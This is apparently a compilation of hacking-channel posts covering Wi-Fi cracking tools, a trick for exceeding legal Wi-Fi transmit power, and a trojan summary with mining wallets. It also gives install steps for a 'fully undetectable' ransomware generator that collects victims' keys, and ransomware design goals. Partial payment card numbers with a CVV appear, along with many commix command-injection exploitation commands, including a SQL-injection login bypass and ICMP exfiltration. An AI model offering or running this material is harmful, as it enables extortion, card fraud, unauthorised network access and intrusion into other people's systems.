🦑WIFI IN USA & UK NOW :

> In some countries it is not allowed to use the frequencies of some Wi-Fi channels (for example, in the USA you cannot use channels 12, 13 and 14).

> Most countries have a Wi-Fi signal limit of 20.0 dBm. But there are countries in which there is a limit of 30.0 dBm. You can take advantage of this loophole (to make a Wi-Fi card think that it is in a country where 30.0 dBm is allowed) and raise its power (TX Power) to a value of 30.0 dBm.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST WIFI ADPATER FOR KALI 2020

> 5 GHz band support
Two band, including those with 5 GHz support, are, for example, cards:

1-Alfa AWUS051NH
http://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=9&pub=5575132165&toolid=10001&campid=5337870315&customid=&icep_uq=Alfa+AWUS051NH&icep_sellerId=&icep_ex_kw=&icep_sortBy=12&icep_catId=&icep_minPrice=&icep_maxPrice=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg

2-Alfa AWUS052NH
http://rover.ebay.com/rover/1/711-53200-19255-0/1?icep_ff3=9&pub=5575132165&toolid=10001&campid=5337870315&customid=&icep_uq=Alfa+AWUS052NH&icep_sellerId=&icep_ex_kw=&icep_sortBy=12&icep_catId=&icep_minPrice=&icep_maxPrice=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg

🦑Intel's latest Wi-Fi adapters built into laptops

> They show 5 GHz APs and are capable of intercepting data.

However, when testing the ability to inject, different users receive different data. For some users, everything works, for some at 5 GHz it can only inject on channels 36 to 48. On others (52 to 116), where there is radar detection, there are some problems with the injection of deauthentication packets. In some, the injections do not work on all channels. I belong to the latter - my injection test failed on all tried and tested channels. It is possible that such a spread is associated with a bug in aireplay-ng , the author of the program on the forum confirmed its presence, at the moment the
error has not been fixed.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BASIC WIFI HACKING BY UNDERCODE

BSSID is the MAC address of the wireless card. Example MAC address: 50: 46: 5D: 6E: 8C: 20. They are described in more detail in the note “ How to find out the MAC address and How to find out the manufacturer by MAC address ”.

Handshake (also hendsheyk , handshake ) - data exchanged between the station and the access point at the time of the creation of Wi-Fi connection. This data contains information that allows you to select a password from a Wi-Fi network.

Brute-force (also full search ) is a method of attacking a password, which consists in enumerating all possible password options. It requires a lot of time and computing resources.

Dictionary search ( dictionary attack ) is a method of attacking a password, which consists in enumerating frequently occurring password options. It has a good ratio of resources spent to the results obtained.

Wi-Fi password brute force is a password guessing method that involves connecting to an Access Point with various password candidates. Practically not applicable due to the extremely low speed of search.

Offline Wi-Fi password guessing is a password guessing method that involves grabbing a Handshake and picking up a password that matches that handshake. This selection does not require connection to an Access Point and is performed many orders of magnitude faster than online search. It can also be performed on the computing power of video cards, which increases the speed of search by several orders of magnitude.

WPA and WPA2 - technology for secure access to Wi-Fi, has replaced the outdated technology of WEP.

A wireless Wi-Fi card (or a wireless Wi-Fi adapter ) is any network card that can connect to a Wi-Fi network. On laptops and phones, they are built into the case; on desktop computers, they usually represent an external device that connects via USB.

Monitor mode ( Monitor-Mode ) - the property of some wireless cards receive data packets, which are designed not only for them but also for other wireless devices.

Network interface - the name, symbol in Linux for network cards / adapters.

A Wi-Fi network channel is a conventional digital designation of the frequency at which the Access Point is currently operating.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Wi-Fi Hacking Software list 4
This list Special for Kali Users


1️⃣airodump-ng is a tool for capturing wireless packets. Very often used to capture four-stage handshakes, which are later used to crack a Wi-Fi network password. It can capture any frames of wireless networks for further analysis.
https://kali.tools/?p=411

2️⃣airodump-ng is a tool for capturing wireless packets. Very often used to capture four-stage handshakes, which are later used to crack a Wi-Fi network password. It can capture any frames of wireless networks for further analysis.
https://kali.tools/?p=411

3️⃣boopsniff - a program from the BoopSuite package to show access points in the range of accessibility and capture handshakes.
https://kali.tools/?p=3409

4️⃣WPA2-HalfHandshake-Crack is a working concept to demonstrate the possibility of hacking a WPA2 network by grabbing a handshake from a user trying to connect to a fake AP. Those. grabs a half handshake.
https://kali.tools/?p=2794

5️⃣Reaver is designed to select the WPS (Wifi Protected Setup) pin by brute force. Reaver was created for a reliable and practical attack on WPS; it was tested on a large number of access points with different WPS implementations. On average, Reaver reveals the WPA / WPA2 password in plain text to the target access point (AP) for 4-10 hours, depending on the AP. In practice, he usually needs half this time to guess the WPS pin and guess the password.
https://kali.tools/?p=355

6️⃣Pixiewps is a tool written in C that is used to offline brute force the WPS pin by exploiting the low or nonexistent entropy of some access points (pixie dust attack).
> https://kali.tools/?p=351

🦑Those some from kali wifi hacking tools - Kali is a good hacking os

but don't even mind the Undercode Linux Os that we use their include more than those tools and more automation for wifi hacking ...

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Client installation under Windows
#Fast Tip
Let's look at what happens when you install the client on Windows. No matter how hidden the process of installing the server, some initial data will still have to be set, explicitly requesting it from the user or setting some default values.

During the installation process of the InterBase client, you need to specify the directory where InterBase will be installed

> let's call it <InterBase root>. Client installation includes the following steps:

1)Copy files included in the client.

2) Register files for sharing.

3) Create registry keys.

4)Registration of the TCP / IP service.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑GuardMiner mining trojan has recently been active and has the ability to actively attack worms.

1️⃣The Trojan will scan and attack multiple server component vulnerabilities in Redis, Drupal, Hadoop, Spring, thinkphp, WebLogic, SQLServer, Elasticsearch, and Windows and Linux under attack.

2️⃣ The malicious scripts init.ps1 and init.sh are executed in the system, and the malicious script will further download the Monero mining trojan, remove the competitive mining trojan and perform local persistent operation. In the Linux system, use SSH connection and Redis weak password blasting to conduct intranet proliferation attacks.

3️⃣ Init.ps1 attacks the Windows system, downloads the mining process phpupdate.exe from the server, configuration file config.json, scans the attack process networkmanager.exe, persistent script newdat.ps1, mining daemon phpguard.exe, clean script clean .bat.

4️⃣ Init.sh attacks the Linux system, downloads the mining process phpupdate from the server, the configuration file config.json, the persistent script newdat.sh, scans the attack process networkmanager, and mining daemon phpuguard.

5️⃣The three sets of mining pools and wallets used for mining are as follows:
xmr.f2pool.com : 13531
43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfwozyfS520

xmr-eu2.nanopool.org:
14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520

randomxmonero.hk.nicehash.com:3380
3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520

....
@UndercodeNews
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A Hackers framework topic git:

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

$ git clone https://github.com/Eitenne/roxysploit.git; cd roxysploit; sudo /bin/bash install

🦑OS :

Arch Linux Working
Kali Linux Working
Ubuntu Working
Debian Working
Centos Not Tested
MacOSX Needs porting
Windows Ha no.

> RUN :

rsf > use Picklock
rsf (plugins/picklock) > help


✅Git TOPIC sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑information gathering :
AngryFuzz3r is a collection of tools for pentesting to gather information and discover vulnerabilities of the targets based on Fuzzedb

🦑FEATURES :

-Fuzz url set from an input file
-Concurrent relative path search
-Configurable number of fuzzing workers
-Fuzz CMS ==> Wordpress,Durpal,Joomla
-Generate reports of the valid paths

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/ihebski/angryFuzzer.git

2️⃣ cd angryFuzzer

3️⃣$ python angryFuzzer.py -h
Usage: angryFuzzer.py options

4️⃣Examples :

> Fuzzing an url with default dictionary

 angryFuzzer.py -u http://127.0.0.1 

> Fuzzing CMS (wp: in this exemple !)

 angryFuzzer.py -u http://127.0.0.1 --cms wp 

> Fuzzing a custom Wordlist

python angryFuzzer.py -u http://127.0.0.1 -w fuzzdb/discovery/predictable-filepaths/php/PHP.txt

✅git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

TOR FRONTING WRITTEN TUTORIAL PDF

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS EXPLOITS TUTORIALS SOURCES :

+ Bypassing DEP by returning into HeapCreate - by Toto

+ First public ASLR bypass exploit by using partial overwrite - by Skape

+ Heap spray and bypassing DEP - by Skylined

+ First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability

+ Exploit codes of bypassing browsers memory protections

+ PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 - by Cesar Cerrudo
+ PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 - by Cesar Cerrudo

+ An exploit works from win 3.1 to win 7 - by Tavis Ormandy KiTra0d

+ Old ms08-067 metasploit module multi-target and DEP bypass

+ PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass

+ SMBv2 Exploit - by Stephen Fewer

+ Microsoft IIS 7.5 remote heap buffer overflow - by redpantz

+ Browser Exploitation Case Study for Internet Explorer 11

✅git 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Game Character Animation in Maya and Unity —1.4 GB—

https://www.pluralsight.com/courses/unity-maya-game-character-animation

REMOVED REQUEST @UNDERCODE_TESTING

🦑MCSD 70-483 C# Complete Preparation Course + Practice Exams —3.9 GB


REMOVED REQUEST @UNDERCODE_TESTING

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RANSOMWARE 2020 :


FEATURES :

Generate a ransomware payload
With or without GUI payload
FUD (Fully Undetectable by Anti-Virus)
Works on Windows, MacOS and Linux
Super fast encryption with PyCrypto
Compile to EXE, APP or Unix/Linux executable
Custom icon for your EXE payload
Receive keys of victims
Decrypt files
Demo mode (payload won't encrypt anything)
Fullscreen mode (Warning takes over the screen)
Custom warning message for your victim
Custom image in your payload
Ghost mode (Rename by adding .DEMON extention instead of encrypting the files)
Multiple encryption methods
Select file extentions to target
Decide if payload should self-destruct (Console mode feature only)
Decide wich drive to target for encryption (working directory)
Verified server access through port forwarding VPN

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

 clone https://github.com/leonv024/RAASNet.git

2️⃣pip3 install -r requirements.txt

3️⃣python3 RAASNet.py

On Linux, you might need to install these packages:

 apt install python3-tk python3-pil python3-pil.imagetk

Testing connection with remote server:

 Change the host and port in test_socket.py, default is 127.0.0.1 on port 8989
python3 test_socket.py

> for More free tutorials for beginers about it :

https://github.com/leonv024/RAASNet/blob/master/demo/PyCrypto-vs-PyAES_demo_10fps.gif

ENJOY 👍🏻

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RANSOMWARE TUTORIALS FOR BEGINERS (from git sources)

Ransomware Impact on industry

https://medium.com/@tarcisioma/how-can-a-malware-encrypt-a-company-existence-c7ed584f66b3

How this ransomware encryption scheme works:

https://medium.com/@tarcisioma/ransomware-encryption-techniques-696531d07bb9

How this ransomware works:

https://0x00sec.org/t/how-ransomware-works-and-gonnacry-linux-ransomware/4594

https://medium.com/@tarcisioma/how-ransomware-works-and-gonnacry-linux-ransomware-17f77a549114

Mentions:

https://www.sentinelone.com/blog/sentinelone-detects-prevents-wsl-abuse/

https://hackingvision.com/2017/07/18/gonnacry-linux-ransomware/

https://www.youtube.com/watch?v=gSfa2L158Uw

✅git sources 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What's a Ransomware?

A ransomware is a form of malware that prevent legitimate users from accessing their device or data and asks for a payment in exchange for the stolen functionality. They have been used for mass extortion in various forms, but the most successful seem to be encrypting ransomware: most of the user data are encrypted and the key can be retrieved with a payment to the attacker. To be widely successful a ransomware must fulfill three properties:

Property 1: The hostile binary code must not contain any secret (e.g. deciphering keys). At least not in an easily retrievable form, indeed white box cryptography can be applied to ransomware.

Property 2: Only the author of the attack should be able to decrypt the infected device.

Property 3: Decrypting one device can not provide any useful information for other infected devices, in particular the key must not be shared among them.

🦑Objectives:

 encrypt all user files with AES-256-CBC.
 Random AES key and IV for each file.
 Works even without internet connection.
 Communication with the server to decrypt Client-private-key.
 encrypt AES key with client-public-key RSA-2048.
 encrypt client-private-key with RSA-2048 server-public-key.
 Change computer wallpaper -> Gnome, LXDE, KDE, XFCE.
 Decryptor that communicate to server to send keys.
 python webserver
 Daemon
 Dropper
 Kill databases

THOSE FROM GITHUB SOURCES
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

BIN Amazon Prime Video

: 442756103622xxxx
442756152271xxxx
442756161628xxxx

FECHA: 01/24

CVV : 067

IP : USA

Postal: 11213

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automated All-in-One OS command injection and exploitation tool
Termux-Linux
WHY YOU SHOULD USE THIS TOOL ?
used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣git clone https://github.com/commixproject/commix.git

2️⃣cd commix

3️⃣python commix.py -h

4️⃣1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

🦑OS :

-Kali
-Parrot
-debian
-ubuntu
-termux

✅GIT SOURCES
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Free Port Scanner for Windows
-and How to see who is on your wifi windows ?


Although the title says that Angry IP Scanner is a port scanner for Windows, in fact it is a cross-platform scanner that works great on Linux as well as on Mac. But Linux has Nmap - a powerful network scanner with many options and additional functions for obtaining information about hosts on the network. By the way, Nmap also works on Windows and even has a graphical interface, but many Windows users find it difficult to deal with the command line and numerous Nmap options, and many just don’t need such an abundance of functions (see the article Port Scanner for Windows ).

So, Angry IP Scanner is a simple and intuitive program for finding hosts and scanning ports of computers, sites, servers, phones and any other online devices.

🦑Download : https://angryip.org/download/#windows

#TIPSFORNOOBS
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

ENJOY 👍🏻